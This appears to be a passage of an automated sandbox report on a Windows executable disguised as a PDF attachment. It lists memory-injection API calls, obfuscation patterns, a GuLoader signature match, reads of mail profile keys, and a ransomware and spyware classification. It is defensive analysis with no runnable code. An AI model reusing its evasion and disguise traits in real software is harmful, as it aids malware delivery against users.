Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AE062	0_2_020AE062
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A8067	0_2_020A8067
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AE08F	0_2_020AE08F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A9099	0_2_020A9099
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A70A8	0_2_020A70A8
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A80BB	0_2_020A80BB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AD0BF	0_2_020AD0BF
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A90CF	0_2_020A90CF
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AD103	0_2_020AD103
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A912B	0_2_020A912B
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7127	0_2_020A7127
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A8130	0_2_020A8130
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AD15F	0_2_020AD15F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AA17B	0_2_020AA17B
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AE177	0_2_020AE177
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A81BB	0_2_020A81BB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AD1DB	0_2_020AD1DB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7643	0_2_020A7643
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AB645	0_2_020AB645
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A76B3	0_2_020A76B3
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7723	0_2_020A7723
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A77B8	0_2_020A77B8
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AF7D5	0_2_020AF7D5
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AE431	0_2_020AE431
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A945F	0_2_020A945F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A8463	0_2_020A8463
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A0494	0_2_020A0494
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AE4A7	0_2_020AE4A7
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A94C3	0_2_020A94C3
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AC4EB	0_2_020AC4EB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A84FB	0_2_020A84FB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A750E	0_2_020A750E
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AE517	0_2_020AE517
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A9523	0_2_020A9523
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A8547	0_2_020A8547
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7552	0_2_020A7552
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A85CB	0_2_020A85CB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A9A53	0_2_020A9A53
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7A6F	0_2_020A7A6F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A0AB8	0_2_020A0AB8
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A9AD7	0_2_020A9AD7
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7AE7	0_2_020A7AE7
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020ADB37	0_2_020ADB37
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A9B44	0_2_020A9B44
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020ADB6F	0_2_020ADB6F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7BA3	0_2_020A7BA3
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020ADBC7	0_2_020ADBC7
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020ADBFF	0_2_020ADBFF
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7807	0_2_020A7807
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A788B	0_2_020A788B
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A790F	0_2_020A790F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A796E	0_2_020A796E
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7963	0_2_020A7963
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7974	0_2_020A7974
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A99DB	0_2_020A99DB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A79FB	0_2_020A79FB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7E6F	0_2_020A7E6F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7EE3	0_2_020A7EE3
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020ADEF7	0_2_020ADEF7
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AEF2F	0_2_020AEF2F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7F5B	0_2_020A7F5B
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AEF6B	0_2_020AEF6B
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020ADF8B	0_2_020ADF8B
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020ADFC3	0_2_020ADFC3
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A9C0F	0_2_020A9C0F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7C2F	0_2_020A7C2F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A6C4E	0_2_020A6C4E
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A9C83	0_2_020A9C83
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7C9B	0_2_020A7C9B
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020ADCE3	0_2_020ADCE3
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A9D07	0_2_020A9D07
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7D13	0_2_020A7D13
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020ADD17	0_2_020ADD17
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020ADD6F	0_2_020ADD6F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7D73	0_2_020A7D73
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A9D74	0_2_020A9D74
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020ADDDB	0_2_020ADDDB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7DEB	0_2_020A7DEB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A9DE7	0_2_020A9DE7

Contains functionality to call native functions

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A942C NtAllocateVirtualMemory,	0_2_020A942C
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020ADAD0 NtWriteVirtualMemory,	0_2_020ADAD0
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AE9C2 NtProtectVirtualMemory,	0_2_020AE9C2
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A820F NtWriteVirtualMemory,	0_2_020A820F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A826F NtWriteVirtualMemory,	0_2_020A826F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A82FB NtWriteVirtualMemory,	0_2_020A82FB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A835F NtWriteVirtualMemory,	0_2_020A835F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A4364 NtWriteVirtualMemory,	0_2_020A4364
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A83CB NtWriteVirtualMemory,	0_2_020A83CB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AD02E NtWriteVirtualMemory,	0_2_020AD02E
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A8067 NtWriteVirtualMemory,	0_2_020A8067
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A70A8 NtWriteVirtualMemory,	0_2_020A70A8
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A80BB NtWriteVirtualMemory,	0_2_020A80BB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A8130 NtWriteVirtualMemory,	0_2_020A8130
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A81BB NtWriteVirtualMemory,	0_2_020A81BB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A961B NtAllocateVirtualMemory,	0_2_020A961B
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A9635 NtAllocateVirtualMemory,	0_2_020A9635
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7643 NtWriteVirtualMemory,	0_2_020A7643
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AB645 NtWriteVirtualMemory,	0_2_020AB645
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A8663 NtWriteVirtualMemory,	0_2_020A8663
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A76B3 NtWriteVirtualMemory,	0_2_020A76B3
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A96CB NtAllocateVirtualMemory,	0_2_020A96CB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A86E3 NtWriteVirtualMemory,	0_2_020A86E3
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7723 NtWriteVirtualMemory,	0_2_020A7723
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A9747 NtAllocateVirtualMemory,	0_2_020A9747
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A8753 NtWriteVirtualMemory,	0_2_020A8753
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A77B8 NtWriteVirtualMemory,	0_2_020A77B8
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AF7D5 NtWriteVirtualMemory,	0_2_020AF7D5
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A945F NtAllocateVirtualMemory,	0_2_020A945F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A8463 NtWriteVirtualMemory,	0_2_020A8463
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A0494 NtWriteVirtualMemory,LoadLibraryA,	0_2_020A0494
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A94C3 NtAllocateVirtualMemory,	0_2_020A94C3
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A84FB NtWriteVirtualMemory,	0_2_020A84FB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A9523 NtAllocateVirtualMemory,	0_2_020A9523
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A8547 NtWriteVirtualMemory,	0_2_020A8547
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7552 NtWriteVirtualMemory,	0_2_020A7552
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A9593 NtAllocateVirtualMemory,	0_2_020A9593
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A95BD NtAllocateVirtualMemory,	0_2_020A95BD
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A85CB NtWriteVirtualMemory,	0_2_020A85CB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7A6F NtWriteVirtualMemory,	0_2_020A7A6F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AEA7F NtProtectVirtualMemory,	0_2_020AEA7F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7AE7 NtWriteVirtualMemory,	0_2_020A7AE7
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7BA3 NtWriteVirtualMemory,	0_2_020A7BA3
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7807 NtWriteVirtualMemory,	0_2_020A7807
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A788B NtWriteVirtualMemory,	0_2_020A788B
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A790F NtWriteVirtualMemory,	0_2_020A790F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A796E NtWriteVirtualMemory,	0_2_020A796E
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7963 NtWriteVirtualMemory,	0_2_020A7963
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7974 NtWriteVirtualMemory,	0_2_020A7974
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A79FB NtWriteVirtualMemory,	0_2_020A79FB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020AEE11 NtProtectVirtualMemory,	0_2_020AEE11
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7E6F NtWriteVirtualMemory,	0_2_020A7E6F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7EE3 NtWriteVirtualMemory,	0_2_020A7EE3
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7F5B NtWriteVirtualMemory,	0_2_020A7F5B
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7C2F NtWriteVirtualMemory,	0_2_020A7C2F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7C9B NtWriteVirtualMemory,	0_2_020A7C9B
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7D13 NtWriteVirtualMemory,	0_2_020A7D13
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7D73 NtWriteVirtualMemory,	0_2_020A7D73
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A7DEB NtWriteVirtualMemory,	0_2_020A7DEB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 13_2_0056FBF7 LdrInitializeThunk,NtProtectVirtualMemory,	13_2_0056FBF7
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 13_2_0056FD81 Sleep,LdrInitializeThunk,NtProtectVirtualMemory,	13_2_0056FD81
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 13_2_0056FE33 NtProtectVirtualMemory,	13_2_0056FE33
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 13_2_0056FC2B LdrInitializeThunk,NtProtectVirtualMemory,	13_2_0056FC2B
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 13_2_0056FBF1 LdrInitializeThunk,NtProtectVirtualMemory,	13_2_0056FBF1
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 13_2_0056FB82 LdrInitializeThunk,NtProtectVirtualMemory,	13_2_0056FB82
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 13_2_0056FBAF LdrInitializeThunk,NtProtectVirtualMemory,	13_2_0056FBAF
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 13_2_0056FCAF NtProtectVirtualMemory,	13_2_0056FCAF

Abnormal high CPU Usage

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe

Process Stats: CPU usage > 98%

Sample file is different than original file name gathered from version info

Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.338762831.000000000041C000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameForm_reduc.exe vs Anexo I e II do convite#U00b7pdf.exe
Source: Anexo I e II do convite#U00b7pdf.exe, 00000000.00000002.339931590.0000000002A90000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameForm_reduc.exeFE2X vs Anexo I e II do convite#U00b7pdf.exe
Source: Anexo I e II do convite#U00b7pdf.exe, 0000000D.00000000.336777031.000000000041C000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameForm_reduc.exe vs Anexo I e II do convite#U00b7pdf.exe
Source: Anexo I e II do convite#U00b7pdf.exe	Binary or memory string: OriginalFilenameForm_reduc.exe vs Anexo I e II do convite#U00b7pdf.exe

PE file contains strange resources

Source: Anexo I e II do convite#U00b7pdf.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

PE / OLE file has an invalid certificate

Source: Anexo I e II do convite#U00b7pdf.exe

Static PE information: invalid certificate

Source: Anexo I e II do convite#U00b7pdf.exe

Virustotal: Detection: 29%

Source: Anexo I e II do convite#U00b7pdf.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe "C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe"
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process created: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe "C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe"
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process created: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe "C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto

Jump to behavior

Source: classification engine

Classification label: mal100.rans.troj.spyw.evad.winEXE@3/2@2/3

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe

Mutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

Jump to behavior

Data Obfuscation:

Yara detected GuLoader

Source: Yara match	File source: 0000000D.00000000.338047511.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.339290242.00000000020A0000.00000040.00000001.sdmp, type: MEMORY

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_00402640 push 0040130Eh; ret	0_2_00402653
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_00402654 push 0040130Eh; ret	0_2_00402667
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_00402668 push 0040130Eh; ret	0_2_0040267B
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_0040267C push 0040130Eh; ret	0_2_0040268F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_00402604 push 0040130Eh; ret	0_2_00402617
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_00402618 push 0040130Eh; ret	0_2_0040262B
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_0040262C push 0040130Eh; ret	0_2_0040263F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_004026CC push 0040130Eh; ret	0_2_004026DF
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_004026E0 push 0040130Eh; ret	0_2_004026F3
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_004026F4 push 0040130Eh; ret	0_2_00402707
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_00402690 push 0040130Eh; ret	0_2_004026A3
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_004026A4 push 0040130Eh; ret	0_2_004026B7
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_004026B8 push 0040130Eh; ret	0_2_004026CB
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_00402744 push 0040130Eh; ret	0_2_00402757
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_00402758 push 0040130Eh; ret	0_2_0040276B
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_00404B67 push ds; ret	0_2_00404B68
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_0040276C push 0040130Eh; ret	0_2_0040277F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_00403D73 push esp; iretd	0_2_00403D74
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_00402708 push 0040130Eh; ret	0_2_0040271B
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_0040271C push 0040130Eh; ret	0_2_0040272F
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_0040231C push 0040130Eh; ret	0_2_00402603
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_00406F2A push ecx; retf	0_2_00406F3D
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_00402730 push 0040130Eh; ret	0_2_00402743
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_00402780 push 0040130Eh; ret	0_2_00402793
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_0040618C push 10768459h; retf	0_2_00406191
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_00402794 push 0040130Eh; ret	0_2_004027A7
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A942C push C30B40E8h; retf 5D80h	0_2_020A991E
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A313B push cs; retf	0_2_020A313C
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A961B push C30B40E8h; retf 5D80h	0_2_020A991E
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A9635 push C30B40E8h; retf 5D80h	0_2_020A991E
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Code function: 0_2_020A4640 push FFFFFF81h; ret	0_2_020A4642

Persistence and Installation Behavior:

Creates processes with suspicious names

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	File created: \anexo i e ii do convite#u00b7pdf.exe
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	File created: \anexo i e ii do convite#u00b7pdf.exe			Jump to behavior

Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Anexo I e II do convite#U00b7pdf.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
